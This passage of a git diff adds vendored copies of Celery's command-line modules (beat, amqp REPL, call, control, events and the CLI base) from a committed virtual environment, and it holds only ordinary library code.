super().__init__() + self.app = app + self.service = Service(app, **kwargs) + self.name = 'Beat' + + def run(self): + reset_signals(full=False) + platforms.close_open_fds([ + sys.__stdin__, sys.__stdout__, sys.__stderr__, + ] + list(iter_open_logger_fds())) + self.app.set_default() + self.app.set_current() + self.service.start(embedded_process=True) + + def stop(self): + self.service.stop() + self.terminate() + + +def EmbeddedService(app, max_interval=None, **kwargs): + """Return embedded clock service. + + Arguments: + thread (bool): Run threaded instead of as a separate process. + Uses :mod:`multiprocessing` by default, if available. + """ + if kwargs.pop('thread', False) or _Process is None: + # Need short max interval to be able to stop thread + # in reasonable time. + return _Threaded(app, max_interval=1, **kwargs) + return _Process(app, max_interval=max_interval, **kwargs) diff --git a/env/Lib/site-packages/celery/bin/__init__.py b/env/Lib/site-packages/celery/bin/__init__.py new file mode 100644 index 00000000..e69de29b diff --git a/env/Lib/site-packages/celery/bin/amqp.py b/env/Lib/site-packages/celery/bin/amqp.py new file mode 100644 index 00000000..b42b1dae --- /dev/null +++ b/env/Lib/site-packages/celery/bin/amqp.py @@ -0,0 +1,312 @@ +"""AMQP 0.9.1 REPL.""" + +import pprint + +import click +from amqp import Connection, Message +from click_repl import register_repl + +__all__ = ('amqp',) + +from celery.bin.base import handle_preload_options + + +def dump_message(message): + if message is None: + return 'No messages in queue. basic.publish something.' + return {'body': message.body, + 'properties': message.properties, + 'delivery_info': message.delivery_info} + + +class AMQPContext: + def __init__(self, cli_context): + self.cli_context = cli_context + self.connection = self.cli_context.app.connection() + self.channel = None + self.reconnect() + + @property + def app(self): + return self.cli_context.app + + def respond(self, retval): + if isinstance(retval, str): + self.cli_context.echo(retval) + else: + self.cli_context.echo(pprint.pformat(retval)) + + def echo_error(self, exception): + self.cli_context.error(f'{self.cli_context.ERROR}: {exception}') + + def echo_ok(self): + self.cli_context.echo(self.cli_context.OK) + + def reconnect(self): + if self.connection: + self.connection.close() + else: + self.connection = self.cli_context.app.connection() + + self.cli_context.echo(f'-> connecting to {self.connection.as_uri()}.') + try: + self.connection.connect() + except (ConnectionRefusedError, ConnectionResetError) as e: + self.echo_error(e) + else: + self.cli_context.secho('-> connected.', fg='green', bold=True) + self.channel = self.connection.default_channel + + +@click.group(invoke_without_command=True) +@click.pass_context +@handle_preload_options +def amqp(ctx): + """AMQP Administration Shell. + + Also works for non-AMQP transports (but not ones that + store declarations in memory). + """ + if not isinstance(ctx.obj, AMQPContext): + ctx.obj = AMQPContext(ctx.obj) + + +@amqp.command(name='exchange.declare') +@click.argument('exchange', + type=str) +@click.argument('type', + type=str) +@click.argument('passive', + type=bool, + default=False) +@click.argument('durable', + type=bool, + default=False) +@click.argument('auto_delete', + type=bool, + default=False) +@click.pass_obj +def exchange_declare(amqp_context, exchange, type, passive, durable, + auto_delete): + if amqp_context.channel is None: + amqp_context.echo_error('Not connected to broker. Please retry...') + amqp_context.reconnect() + else: + try: + amqp_context.channel.exchange_declare(exchange=exchange, + type=type, + passive=passive, + durable=durable, + auto_delete=auto_delete) + except Exception as e: + amqp_context.echo_error(e) + amqp_context.reconnect() + else: + amqp_context.echo_ok() + + +@amqp.command(name='exchange.delete') +@click.argument('exchange', + type=str) +@click.argument('if_unused', + type=bool) +@click.pass_obj +def exchange_delete(amqp_context, exchange, if_unused): + if amqp_context.channel is None: + amqp_context.echo_error('Not connected to broker. Please retry...') + amqp_context.reconnect() + else: + try: + amqp_context.channel.exchange_delete(exchange=exchange, + if_unused=if_unused) + except Exception as e: + amqp_context.echo_error(e) + amqp_context.reconnect() + else: + amqp_context.echo_ok() + + +@amqp.command(name='queue.bind') +@click.argument('queue', + type=str) +@click.argument('exchange', + type=str) +@click.argument('routing_key', + type=str) +@click.pass_obj +def queue_bind(amqp_context, queue, exchange, routing_key): + if amqp_context.channel is None: + amqp_context.echo_error('Not connected to broker. Please retry...') + amqp_context.reconnect() + else: + try: + amqp_context.channel.queue_bind(queue=queue, + exchange=exchange, + routing_key=routing_key) + except Exception as e: + amqp_context.echo_error(e) + amqp_context.reconnect() + else: + amqp_context.echo_ok() + + +@amqp.command(name='queue.declare') +@click.argument('queue', + type=str) +@click.argument('passive', + type=bool, + default=False) +@click.argument('durable', + type=bool, + default=False) +@click.argument('auto_delete', + type=bool, + default=False) +@click.pass_obj +def queue_declare(amqp_context, queue, passive, durable, auto_delete): + if amqp_context.channel is None: + amqp_context.echo_error('Not connected to broker. Please retry...') + amqp_context.reconnect() + else: + try: + retval = amqp_context.channel.queue_declare(queue=queue, + passive=passive, + durable=durable, + auto_delete=auto_delete) + except Exception as e: + amqp_context.echo_error(e) + amqp_context.reconnect() + else: + amqp_context.cli_context.secho( + 'queue:{} messages:{} consumers:{}'.format(*retval), + fg='cyan', bold=True) + amqp_context.echo_ok() + + +@amqp.command(name='queue.delete') +@click.argument('queue', + type=str) +@click.argument('if_unused', + type=bool, + default=False) +@click.argument('if_empty', + type=bool, + default=False) +@click.pass_obj +def queue_delete(amqp_context, queue, if_unused, if_empty): + if amqp_context.channel is None: + amqp_context.echo_error('Not connected to broker. Please retry...') + amqp_context.reconnect() + else: + try: + retval = amqp_context.channel.queue_delete(queue=queue, + if_unused=if_unused, + if_empty=if_empty) + except Exception as e: + amqp_context.echo_error(e) + amqp_context.reconnect() + else: + amqp_context.cli_context.secho( + f'{retval} messages deleted.', + fg='cyan', bold=True) + amqp_context.echo_ok() + + +@amqp.command(name='queue.purge') +@click.argument('queue', + type=str) +@click.pass_obj +def queue_purge(amqp_context, queue): + if amqp_context.channel is None: + amqp_context.echo_error('Not connected to broker. Please retry...') + amqp_context.reconnect() + else: + try: + retval = amqp_context.channel.queue_purge(queue=queue) + except Exception as e: + amqp_context.echo_error(e) + amqp_context.reconnect() + else: + amqp_context.cli_context.secho( + f'{retval} messages deleted.', + fg='cyan', bold=True) + amqp_context.echo_ok() + + +@amqp.command(name='basic.get') +@click.argument('queue', + type=str) +@click.argument('no_ack', + type=bool, + default=False) +@click.pass_obj +def basic_get(amqp_context, queue, no_ack): + if amqp_context.channel is None: + amqp_context.echo_error('Not connected to broker. Please retry...') + amqp_context.reconnect() + else: + try: + message = amqp_context.channel.basic_get(queue, no_ack=no_ack) + except Exception as e: + amqp_context.echo_error(e) + amqp_context.reconnect() + else: + amqp_context.respond(dump_message(message)) + amqp_context.echo_ok() + + +@amqp.command(name='basic.publish') +@click.argument('msg', + type=str) +@click.argument('exchange', + type=str) +@click.argument('routing_key', + type=str) +@click.argument('mandatory', + type=bool, + default=False) +@click.argument('immediate', + type=bool, + default=False) +@click.pass_obj +def basic_publish(amqp_context, msg, exchange, routing_key, mandatory, + immediate): + if amqp_context.channel is None: + amqp_context.echo_error('Not connected to broker. Please retry...') + amqp_context.reconnect() + else: + # XXX Hack to fix Issue #2013 + if isinstance(amqp_context.connection.connection, Connection): + msg = Message(msg) + try: + amqp_context.channel.basic_publish(msg, + exchange=exchange, + routing_key=routing_key, + mandatory=mandatory, + immediate=immediate) + except Exception as e: + amqp_context.echo_error(e) + amqp_context.reconnect() + else: + amqp_context.echo_ok() + + +@amqp.command(name='basic.ack') +@click.argument('delivery_tag', + type=int) +@click.pass_obj +def basic_ack(amqp_context, delivery_tag): + if amqp_context.channel is None: + amqp_context.echo_error('Not connected to broker. Please retry...') + amqp_context.reconnect() + else: + try: + amqp_context.channel.basic_ack(delivery_tag) + except Exception as e: + amqp_context.echo_error(e) + amqp_context.reconnect() + else: + amqp_context.echo_ok() + + +register_repl(amqp) diff --git a/env/Lib/site-packages/celery/bin/base.py b/env/Lib/site-packages/celery/bin/base.py new file mode 100644 index 00000000..63a28957 --- /dev/null +++ b/env/Lib/site-packages/celery/bin/base.py @@ -0,0 +1,287 @@ +"""Click customizations for Celery.""" +import json +import numbers +from collections import OrderedDict +from functools import update_wrapper +from pprint import pformat + +import click +from click import ParamType +from kombu.utils.objects import cached_property + +from celery._state import get_current_app +from celery.signals import user_preload_options +from celery.utils import text +from celery.utils.log import mlevel +from celery.utils.time import maybe_iso8601 + +try: + from pygments import highlight + from pygments.formatters import Terminal256Formatter + from pygments.lexers import PythonLexer +except ImportError: + def highlight(s, *args, **kwargs): + """Place holder function in case pygments is missing.""" + return s + LEXER = None + FORMATTER = None +else: + LEXER = PythonLexer() + FORMATTER = Terminal256Formatter() + + +class CLIContext: + """Context Object for the CLI.""" + + def __init__(self, app, no_color, workdir, quiet=False): + """Initialize the CLI context.""" + self.app = app or get_current_app() + self.no_color = no_color + self.quiet = quiet + self.workdir = workdir + + @cached_property + def OK(self): + return self.style("OK", fg="green", bold=True) + + @cached_property + def ERROR(self): + return self.style("ERROR", fg="red", bold=True) + + def style(self, message=None, **kwargs): + if self.no_color: + return message + else: + return click.style(message, **kwargs) + + def secho(self, message=None, **kwargs): + if self.no_color: + kwargs['color'] = False + click.echo(message, **kwargs) + else: + click.secho(message, **kwargs) + + def echo(self, message=None, **kwargs): + if self.no_color: + kwargs['color'] = False + click.echo(message, **kwargs) + else: + click.echo(message, **kwargs) + + def error(self, message=None, **kwargs): + kwargs['err'] = True + if self.no_color: + kwargs['color'] = False + click.echo(message, **kwargs) + else: + click.secho(message, **kwargs) + + def pretty(self, n): + if isinstance(n, list): + return self.OK, self.pretty_list(n) + if isinstance(n, dict): + if 'ok' in n or 'error' in n: + return self.pretty_dict_ok_error(n) + else: + s = json.dumps(n, sort_keys=True, indent=4) + if not self.no_color: + s = highlight(s, LEXER, FORMATTER) + return self.OK, s + if isinstance(n, str): + return self.OK, n + return self.OK, pformat(n) + + def pretty_list(self, n): + if not n: + return '- empty -' + return '\n'.join( + f'{self.style("*", fg="white")} {item}' for item in n + ) + + def pretty_dict_ok_error(self, n): + try: + return (self.OK, + text.indent(self.pretty(n['ok'])[1], 4)) + except KeyError: + pass + return (self.ERROR, + text.indent(self.pretty(n['error'])[1], 4)) + + def say_chat(self, direction, title, body='', show_body=False): + if direction == '<-' and self.quiet: + return + dirstr = not self.quiet and f'{self.style(direction, fg="white", bold=True)} ' or '' + self.echo(f'{dirstr} {title}') + if body and show_body: + self.echo(body) + + +def handle_preload_options(f): + """Extract preload options and return a wrapped callable.""" + def caller(ctx, *args, **kwargs): + app = ctx.obj.app + + preload_options = [o.name for o in app.user_options.get('preload', [])] + + if preload_options: + user_options = { + preload_option: kwargs[preload_option] + for preload_option in preload_options + } + + user_preload_options.send(sender=f, app=app, options=user_options) + + return f(ctx, *args, **kwargs) + + return update_wrapper(caller, f) + + +class CeleryOption(click.Option): + """Customized option for Celery.""" + + def get_default(self, ctx, *args, **kwargs): + if self.default_value_from_context: + self.default = ctx.obj[self.default_value_from_context] + return super().get_default(ctx, *args, **kwargs) + + def __init__(self, *args, **kwargs): + """Initialize a Celery option.""" + self.help_group = kwargs.pop('help_group', None) + self.default_value_from_context = kwargs.pop('default_value_from_context', None) + super().__init__(*args, **kwargs) + + +class CeleryCommand(click.Command): + """Customized command for Celery.""" + + def format_options(self, ctx, formatter): + """Write all the options into the formatter if they exist.""" + opts = OrderedDict() + for param in self.get_params(ctx): + rv = param.get_help_record(ctx) + if rv is not None: + if hasattr(param, 'help_group') and param.help_group: + opts.setdefault(str(param.help_group), []).append(rv) + else: + opts.setdefault('Options', []).append(rv) + + for name, opts_group in opts.items(): + with formatter.section(name): + formatter.write_dl(opts_group) + + +class CeleryDaemonCommand(CeleryCommand): + """Daemon commands.""" + + def __init__(self, *args, **kwargs): + """Initialize a Celery command with common daemon options.""" + super().__init__(*args, **kwargs) + self.params.append(CeleryOption(('-f', '--logfile'), help_group="Daemonization Options", + help="Log destination; defaults to stderr")) + self.params.append(CeleryOption(('--pidfile',), help_group="Daemonization Options")) + self.params.append(CeleryOption(('--uid',), help_group="Daemonization Options")) + self.params.append(CeleryOption(('--gid',), help_group="Daemonization Options")) + self.params.append(CeleryOption(('--umask',), help_group="Daemonization Options")) + self.params.append(CeleryOption(('--executable',), help_group="Daemonization Options")) + + +class CommaSeparatedList(ParamType): + """Comma separated list argument.""" + + name = "comma separated list" + + def convert(self, value, param, ctx): + return text.str_to_list(value) + + +class JsonArray(ParamType): + """JSON formatted array argument.""" + + name = "json array" + + def convert(self, value, param, ctx): + if isinstance(value, list): + return value + + try: + v = json.loads(value) + except ValueError as e: + self.fail(str(e)) + + if not isinstance(v, list): + self.fail(f"{value} was not an array") + + return v + + +class JsonObject(ParamType): + """JSON formatted object argument.""" + + name = "json object" + + def convert(self, value, param, ctx): + if isinstance(value, dict): + return value + + try: + v = json.loads(value) + except ValueError as e: + self.fail(str(e)) + + if not isinstance(v, dict): + self.fail(f"{value} was not an object") + + return v + + +class ISO8601DateTime(ParamType): + """ISO 8601 Date Time argument.""" + + name = "iso-86091" + + def convert(self, value, param, ctx): + try: + return maybe_iso8601(value) + except (TypeError, ValueError) as e: + self.fail(e) + + +class ISO8601DateTimeOrFloat(ParamType): + """ISO 8601 Date Time or float argument.""" + + name = "iso-86091 or float" + + def convert(self, value, param, ctx): + try: + return float(value) + except (TypeError, ValueError): + pass + + try: + return maybe_iso8601(value) + except (TypeError, ValueError) as e: + self.fail(e) + + +class LogLevel(click.Choice): + """Log level option.""" + + def __init__(self): + """Initialize the log level option with the relevant choices.""" + super().__init__(('DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL', 'FATAL')) + + def convert(self, value, param, ctx): + if isinstance(value, numbers.Integral): + return value + + value = value.upper() + value = super().convert(value, param, ctx) + return mlevel(value) + + +JSON_ARRAY = JsonArray() +JSON_OBJECT = JsonObject() +ISO8601 = ISO8601DateTime() +ISO8601_OR_FLOAT = ISO8601DateTimeOrFloat() +LOG_LEVEL = LogLevel() +COMMA_SEPARATED_LIST = CommaSeparatedList() diff --git a/env/Lib/site-packages/celery/bin/beat.py b/env/Lib/site-packages/celery/bin/beat.py new file mode 100644 index 00000000..c8a8a499 --- /dev/null +++ b/env/Lib/site-packages/celery/bin/beat.py @@ -0,0 +1,72 @@ +"""The :program:`celery beat` command.""" +from functools import partial + +import click + +from celery.bin.base import LOG_LEVEL, CeleryDaemonCommand, CeleryOption, handle_preload_options +from celery.platforms import detached, maybe_drop_privileges + + +@click.command(cls=CeleryDaemonCommand, context_settings={ + 'allow_extra_args': True +}) +@click.option('--detach', + cls=CeleryOption, + is_flag=True, + default=False, + help_group="Beat Options", + help="Detach and run in the background as a daemon.") +@click.option('-s', + '--schedule', + cls=CeleryOption, + callback=lambda ctx, _, value: value or ctx.obj.app.conf.beat_schedule_filename, + help_group="Beat Options", + help="Path to the schedule database." + " Defaults to `celerybeat-schedule`." + "The extension '.db' may be appended to the filename.") +@click.option('-S', + '--scheduler', + cls=CeleryOption, + callback=lambda ctx, _, value: value or ctx.obj.app.conf.beat_scheduler, + help_group="Beat Options", + help="Scheduler class to use.") +@click.option('--max-interval', + cls=CeleryOption, + type=int, + help_group="Beat Options", + help="Max seconds to sleep between schedule iterations.") +@click.option('-l', + '--loglevel', + default='WARNING', + cls=CeleryOption, + type=LOG_LEVEL, + help_group="Beat Options", + help="Logging level.") +@click.pass_context +@handle_preload_options +def beat(ctx, detach=False, logfile=None, pidfile=None, uid=None, + gid=None, umask=None, workdir=None, **kwargs): + """Start the beat periodic task scheduler.""" + app = ctx.obj.app + + if ctx.args: + try: + app.config_from_cmdline(ctx.args) + except (KeyError, ValueError) as e: + # TODO: Improve the error messages + raise click.UsageError("Unable to parse extra configuration" + " from command line.\n" + f"Reason: {e}", ctx=ctx) + + if not detach: + maybe_drop_privileges(uid=uid, gid=gid) + + beat = partial(app.Beat, + logfile=logfile, pidfile=pidfile, + quiet=ctx.obj.quiet, **kwargs) + + if detach: + with detached(logfile, pidfile, uid, gid, umask, workdir): + return beat().run() + else: + return beat().run() diff --git a/env/Lib/site-packages/celery/bin/call.py b/env/Lib/site-packages/celery/bin/call.py new file mode 100644 index 00000000..b1df9502 --- /dev/null +++ b/env/Lib/site-packages/celery/bin/call.py @@ -0,0 +1,71 @@ +"""The ``celery call`` program used to send tasks from the command-line.""" +import click + +from celery.bin.base import (ISO8601, ISO8601_OR_FLOAT, JSON_ARRAY, JSON_OBJECT, CeleryCommand, CeleryOption, + handle_preload_options) + + +@click.command(cls=CeleryCommand) +@click.argument('name') +@click.option('-a', + '--args', + cls=CeleryOption, + type=JSON_ARRAY, + default='[]', + help_group="Calling Options", + help="Positional arguments.") +@click.option('-k', + '--kwargs', + cls=CeleryOption, + type=JSON_OBJECT, + default='{}', + help_group="Calling Options", + help="Keyword arguments.") +@click.option('--eta', + cls=CeleryOption, + type=ISO8601, + help_group="Calling Options", + help="scheduled time.") +@click.option('--countdown', + cls=CeleryOption, + type=float, + help_group="Calling Options", + help="eta in seconds from now.") +@click.option('--expires', + cls=CeleryOption, + type=ISO8601_OR_FLOAT, + help_group="Calling Options", + help="expiry time.") +@click.option('--serializer', + cls=CeleryOption, + default='json', + help_group="Calling Options", + help="task serializer.") +@click.option('--queue', + cls=CeleryOption, + help_group="Routing Options", + help="custom queue name.") +@click.option('--exchange', + cls=CeleryOption, + help_group="Routing Options", + help="custom exchange name.") +@click.option('--routing-key', + cls=CeleryOption, + help_group="Routing Options", + help="custom routing key.") +@click.pass_context +@handle_preload_options +def call(ctx, name, args, kwargs, eta, countdown, expires, serializer, queue, exchange, routing_key): + """Call a task by name.""" + task_id = ctx.obj.app.send_task( + name, + args=args, kwargs=kwargs, + countdown=countdown, + serializer=serializer, + queue=queue, + exchange=exchange, + routing_key=routing_key, + eta=eta, + expires=expires + ).id + ctx.obj.echo(task_id) diff --git a/env/Lib/site-packages/celery/bin/celery.py b/env/Lib/site-packages/celery/bin/celery.py new file mode 100644 index 00000000..4aeed425 --- /dev/null +++ b/env/Lib/site-packages/celery/bin/celery.py @@ -0,0 +1,236 @@ +"""Celery Command Line Interface.""" +import os +import pathlib +import sys +import traceback + +try: + from importlib.metadata import entry_points +except ImportError: + from importlib_metadata import entry_points + +import click +import click.exceptions +from click.types import ParamType +from click_didyoumean import DYMGroup +from click_plugins import with_plugins + +from celery import VERSION_BANNER +from celery.app.utils import find_app +from celery.bin.amqp import amqp +from celery.bin.base import CeleryCommand, CeleryOption, CLIContext +from celery.bin.beat import beat +from celery.bin.call import call +from celery.bin.control import control, inspect, status +from celery.bin.events import events +from celery.bin.graph import graph +from celery.bin.list import list_ +from celery.bin.logtool import logtool +from celery.bin.migrate import migrate +from celery.bin.multi import multi +from celery.bin.purge import purge +from celery.bin.result import result +from celery.bin.shell import shell +from celery.bin.upgrade import upgrade +from celery.bin.worker import worker + +UNABLE_TO_LOAD_APP_MODULE_NOT_FOUND = click.style(""" +Unable to load celery application. +The module {0} was not found.""", fg='red') + +UNABLE_TO_LOAD_APP_ERROR_OCCURRED = click.style(""" +Unable to load celery application. +While trying to load the module {0} the following error occurred: +{1}""", fg='red') + +UNABLE_TO_LOAD_APP_APP_MISSING = click.style(""" +Unable to load celery application. +{0}""") + + +class App(ParamType): + """Application option.""" + + name = "application" + + def convert(self, value, param, ctx): + try: + return find_app(value) + except ModuleNotFoundError as e: + if e.name != value: + exc = traceback.format_exc() + self.fail( + UNABLE_TO_LOAD_APP_ERROR_OCCURRED.format(value, exc) + ) + self.fail(UNABLE_TO_LOAD_APP_MODULE_NOT_FOUND.format(e.name)) + except AttributeError as e: + attribute_name = e.args[0].capitalize() + self.fail(UNABLE_TO_LOAD_APP_APP_MISSING.format(attribute_name)) + except Exception: + exc = traceback.format_exc() + self.fail( + UNABLE_TO_LOAD_APP_ERROR_OCCURRED.format(value, exc) + ) + + +APP = App() + + +if sys.version_info >= (3, 10): + _PLUGINS = entry_points(group='celery.commands') +else: + try: + _PLUGINS = entry_points().get('celery.commands', []) + except AttributeError: + _PLUGINS = entry_points().select(group='celery.commands') + + +@with_plugins(_PLUGINS) +@click.group(cls=DYMGroup, invoke_without_command=True) +@click.option('-A', + '--app', + envvar='APP', + cls=CeleryOption, + type=APP, + help_group="Global Options") +@click.option('-b', + '--broker', + envvar='BROKER_URL', + cls=CeleryOption, + help_group="Global Options") +@click.option('--result-backend', + envvar='RESULT_BACKEND', + cls=CeleryOption, + help_group="Global Options") +@click.option('--loader', + envvar='LOADER', + cls=CeleryOption, + help_group="Global Options") +@click.option('--config', + envvar='CONFIG_MODULE', + cls=CeleryOption, + help_group="Global Options") +@click.option('--workdir', + cls=CeleryOption, + type=pathlib.Path, + callback=lambda _, __, wd: os.chdir(wd) if wd else None, + is_eager=True, + help_group="Global Options") +@click.option('-C', + '--no-color', + envvar='NO_COLOR', + is_flag=True, + cls=CeleryOption, + help_group="Global Options") +@click.option('-q', + '--quiet', + is_flag=True, + cls=CeleryOption, + help_group="Global Options") +@click.option('--version', + cls=CeleryOption, + is_flag=True, + help_group="Global Options") +@click.option('--skip-checks', + envvar='SKIP_CHECKS', + cls=CeleryOption, + is_flag=True, + help_group="Global Options", + help="Skip Django core checks on startup. Setting the SKIP_CHECKS environment " + "variable to any non-empty string will have the same effect.") +@click.pass_context +def celery(ctx, app, broker, result_backend, loader, config, workdir, + no_color, quiet, version, skip_checks): + """Celery command entrypoint.""" + if version: + click.echo(VERSION_BANNER) + ctx.exit() + elif ctx.invoked_subcommand is None: + click.echo(ctx.get_help()) + ctx.exit() + + if loader: + # Default app takes loader from this env (Issue #1066). + os.environ['CELERY_LOADER'] = loader + if broker: + os.environ['CELERY_BROKER_URL'] = broker + if result_backend: + os.environ['CELERY_RESULT_BACKEND'] = result_backend + if config: + os.environ['CELERY_CONFIG_MODULE'] = config + if skip_checks: + os.environ['CELERY_SKIP_CHECKS'] = 'true' + ctx.obj = CLIContext(app=app, no_color=no_color, workdir=workdir, + quiet=quiet) + + # User options + worker.params.extend(ctx.obj.app.user_options.get('worker', [])) + beat.params.extend(ctx.obj.app.user_options.get('beat', [])) + events.params.extend(ctx.obj.app.user_options.get('events', [])) + + for command in celery.commands.values(): + command.params.extend(ctx.obj.app.user_options.get('preload', [])) + + +@celery.command(cls=CeleryCommand) +@click.pass_context +def report(ctx, **kwargs): + """Shows information useful to include in bug-reports.""" + app = ctx.obj.app + app.loader.import_default_modules() + ctx.obj.echo(app.bugreport()) + + +celery.add_command(purge) +celery.add_command(call) +celery.add_command(beat) +celery.add_command(list_) +celery.add_command(result) +celery.add_command(migrate) +celery.add_command(status) +celery.add_command(worker) +celery.add_command(events) +celery.add_command(inspect) +celery.add_command(control) +celery.add_command(graph) +celery.add_command(upgrade) +celery.add_command(logtool) +celery.add_command(amqp) +celery.add_command(shell) +celery.add_command(multi) + +# Monkey-patch click to display a custom error +# when -A or --app are used as sub-command options instead of as options +# of the global command. + +previous_show_implementation = click.exceptions.NoSuchOption.show + +WRONG_APP_OPTION_USAGE_MESSAGE = """You are using `{option_name}` as an option of the {info_name} sub-command: +celery {info_name} {option_name} celeryapp <...> + +The support for this usage was removed in Celery 5.0. Instead you should use `{option_name}` as a global option: +celery {option_name} celeryapp {info_name} <...>""" + + +def _show(self, file=None): + if self.option_name in ('-A', '--app'): + self.ctx.obj.error( + WRONG_APP_OPTION_USAGE_MESSAGE.format( + option_name=self.option_name, + info_name=self.ctx.info_name), + fg='red' + ) + previous_show_implementation(self, file=file) + + +click.exceptions.NoSuchOption.show = _show + + +def main() -> int: + """Start celery umbrella command. + + This function is the main entrypoint for the CLI. + + :return: The exit code of the CLI. + """ + return celery(auto_envvar_prefix="CELERY") diff --git a/env/Lib/site-packages/celery/bin/control.py b/env/Lib/site-packages/celery/bin/control.py new file mode 100644 index 00000000..f7bba96d --- /dev/null +++ b/env/Lib/site-packages/celery/bin/control.py @@ -0,0 +1,203 @@ +"""The ``celery control``, ``. inspect`` and ``. status`` programs.""" +from functools import partial + +import click +from kombu.utils.json import dumps + +from celery.bin.base import COMMA_SEPARATED_LIST, CeleryCommand, CeleryOption, handle_preload_options +from celery.exceptions import CeleryCommandException +from celery.platforms import EX_UNAVAILABLE +from celery.utils import text +from celery.worker.control import Panel + + +def _say_remote_command_reply(ctx, replies, show_reply=False): + node = next(iter(replies)) # <-- take first. + reply = replies[node] + node = ctx.obj.style(f'{node}: ', fg='cyan', bold=True) + status, preply = ctx.obj.pretty(reply) + ctx.obj.say_chat('->', f'{node}{status}', + text.indent(preply, 4) if show_reply else '', + show_body=show_reply) + + +def _consume_arguments(meta, method, args): + i = 0 + try: + for i, arg in enumerate(args): + try: + name, typ = meta.args[i] + except IndexError: + if meta.variadic: + break + raise click.UsageError( + 'Command {!r} takes arguments: {}'.format( + method, meta.signature)) + else: + yield name, typ(arg) if typ is not None else arg + finally: + args[:] = args[i:] + + +def _compile_arguments(action, args): + meta = Panel.meta[action] + arguments = {} + if meta.args: + arguments.update({ + k: v for k, v in _consume_arguments(meta, action, args) + }) + if meta.variadic: + arguments.update({meta.variadic: args}) + return arguments + + +@click.command(cls=CeleryCommand) +@click.option('-t', + '--timeout', + cls=CeleryOption, + type=float, + default=1.0, + help_group='Remote Control Options', + help='Timeout in seconds waiting for reply.') +@click.option('-d', + '--destination', + cls=CeleryOption, + type=COMMA_SEPARATED_LIST, + help_group='Remote Control Options', + help='Comma separated list of destination node names.') +@click.option('-j', + '--json', + cls=CeleryOption, + is_flag=True, + help_group='Remote Control Options', + help='Use json as output format.') +@click.pass_context +@handle_preload_options +def status(ctx, timeout, destination, json, **kwargs): + """Show list of workers that are online.""" + callback = None if json else partial(_say_remote_command_reply, ctx) + replies = ctx.obj.app.control.inspect(timeout=timeout, + destination=destination, + callback=callback).ping() + + if not replies: + raise CeleryCommandException( + message='No nodes replied within time constraint', + exit_code=EX_UNAVAILABLE + ) + + if json: + ctx.obj.echo(dumps(replies)) + nodecount = len(replies) + if not kwargs.get('quiet', False): + ctx.obj.echo('\n{} {} online.'.format( + nodecount, text.pluralize(nodecount, 'node'))) + + +@click.command(cls=CeleryCommand, + context_settings={'allow_extra_args': True}) +@click.argument("action", type=click.Choice([ + name for name, info in Panel.meta.items() + if info.type == 'inspect' and info.visible +])) +@click.option('-t', + '--timeout', + cls=CeleryOption, + type=float, + default=1.0, + help_group='Remote Control Options', + help='Timeout in seconds waiting for reply.') +@click.option('-d', + '--destination', + cls=CeleryOption, + type=COMMA_SEPARATED_LIST, + help_group='Remote Control Options', + help='Comma separated list of destination node names.') +@click.option('-j', + '--json', + cls=CeleryOption, + is_flag=True, + help_group='Remote Control Options', + help='Use json as output format.') +@click.pass_context +@handle_preload_options +def inspect(ctx, action, timeout, destination, json, **kwargs): + """Inspect the worker at runtime. + + Availability: RabbitMQ (AMQP) and Redis transports. + """ + callback = None if json else partial(_say_remote_command_reply, ctx, + show_reply=True) + arguments = _compile_arguments(action, ctx.args) + inspect = ctx.obj.app.control.inspect(timeout=timeout, + destination=destination, + callback=callback) + replies = inspect._request(action, + **arguments) + + if not replies: + raise CeleryCommandException( + message='No nodes replied within time constraint', + exit_code=EX_UNAVAILABLE + ) + + if json: + ctx.obj.echo(dumps(replies)) + return + + nodecount = len(replies) + if not ctx.obj.quiet: + ctx.obj.echo('\n{} {} online.'.format( + nodecount, text.pluralize(nodecount, 'node'))) + + +@click.command(cls=CeleryCommand, + context_settings={'allow_extra_args': True}) +@click.argument("action", type=click.Choice([ + name for name, info in Panel.meta.items() + if info.type == 'control' and info.visible +])) +@click.option('-t', + '--timeout', + cls=CeleryOption, + type=float, + default=1.0, + help_group='Remote Control Options', + help='Timeout in seconds waiting for reply.') +@click.option('-d', + '--destination', + cls=CeleryOption, + type=COMMA_SEPARATED_LIST, + help_group='Remote Control Options', + help='Comma separated list of destination node names.') +@click.option('-j', + '--json', + cls=CeleryOption, + is_flag=True, + help_group='Remote Control Options', + help='Use json as output format.') +@click.pass_context +@handle_preload_options +def control(ctx, action, timeout, destination, json): + """Workers remote control. + + Availability: RabbitMQ (AMQP), Redis, and MongoDB transports. + """ + callback = None if json else partial(_say_remote_command_reply, ctx, + show_reply=True) + args = ctx.args + arguments = _compile_arguments(action, args) + replies = ctx.obj.app.control.broadcast(action, timeout=timeout, + destination=destination, + callback=callback, + reply=True, + arguments=arguments) + + if not replies: + raise CeleryCommandException( + message='No nodes replied within time constraint', + exit_code=EX_UNAVAILABLE + ) + + if json: + ctx.obj.echo(dumps(replies)) diff --git a/env/Lib/site-packages/celery/bin/events.py b/env/Lib/site-packages/celery/bin/events.py new file mode 100644 index 00000000..89470838 --- /dev/null +++ b/env/Lib/site-packages/celery/bin/events.py @@ -0,0 +1,94 @@ +"""The ``celery events`` program.""" +import sys +from functools import partial + +import click + +from celery.bin.base import LOG_LEVEL, CeleryDaemonCommand, CeleryOption, handle_preload_options +from celery.platforms import detached, set_process_title, strargv + + +def _set_process_status(prog, info=''): + prog = '{}:{}'.format('celery events', prog) + info = f'{info} {strargv(sys.argv)}' + return set_process_title(prog, info=info) + + +def _run_evdump(app): + from celery.events.dumper import evdump + _set_process_status('dump') + return evdump(app=app) + + +def _run_evcam(camera, app, logfile=None, pidfile=None, uid=None, + gid=None, umask=None, workdir=None, + detach=False, **kwargs): + from celery.events.snapshot import evcam + _set_process_status('cam') + kwargs['app'] = app + cam = partial(evcam, camera, + logfile=logfile, pidfile=pidfile, **kwargs) + + if detach: + with detached(logfile, pidfile, uid, gid, umask, workdir): + return cam() + else: + return cam() + + +def _run_evtop(app): + try: + from celery.events.cursesmon import evtop + _set_process_status('top') + return evtop(app=app) + except ModuleNotFoundError as e: + if e.name == '_curses': + # TODO: Improve this error message + raise click.UsageError("The curses module is required for this command.") + + +@click.command(cls=CeleryDaemonCommand) +@click.option('-d', + '--dump', + cls=CeleryOption, + is_flag=True, + help_group='Dumper') +@click.option('-c', + '--camera', + cls=CeleryOption, + help_group='Snapshot') +@click.option('-d', + '--detach', + cls=CeleryOption, + is_flag=True, + help_group='Snapshot') +@click.option('-F', '--frequency', '--freq', + type=float, + default=1.0, + cls=CeleryOption, + 